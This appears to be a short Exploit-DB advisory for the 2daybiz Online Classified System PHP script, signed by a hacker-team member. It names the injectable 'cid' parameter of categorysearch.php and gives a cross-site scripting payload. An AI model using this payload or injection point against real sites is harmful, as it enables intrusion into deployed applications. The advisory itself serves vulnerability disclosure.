Online Classified System Script – SQL Injection / Cross-Site Scripting

  • 作者: L0rd CrusAd3r
    日期: 2010-06-22
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/13967/
  • 1 ########################################## 1
    0 I'm L0rd CrusAd3r member from Inj3ct0r Team1
    1 ########################################## 0
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
    Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
    Exploit Title:Online Classified System Script SQLi and XSS Vulnerable
    Vendor url:http://www.2daybiz.com/
    Version:1
    Price:90$
    Published: 2010-06-22
    Greetz to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, M4n0j, Sonic Bluehat.
    Special Greetz: Topsecure.net, inj3ct0r Team , Andhrahackers.com
    Shoutzz:- To all ICW members.
    ~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
    Description:
    
    2daybiz online classified system allows you to start a fully automated classified ads site that includes essential features present in major classifieds sites. Our powerful script written in PHP allows your users to post new ads, for which you can charge a predefined amount. Billing is handled automatically and seamlessly through many of the popular payment gateways. Our classified ads software is fast, simple and fully customized through our built-in editor. 
    
    ~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
    Vulnerability:
    
    *SQLi Vulnerable
    
    DEMO URL:
    
    http://server/classified/categorysearch.php?cid=[sqli]
    
    *XSS Vulnerable
    
    Parameter:'"--><script>alert(0x000872)</script>
    
    DEMO URL:
    
    http://server/classified/categorysearch.php?cid=[xss]
    
    # 0day n0 m0re #
    # L0rd CrusAd3r #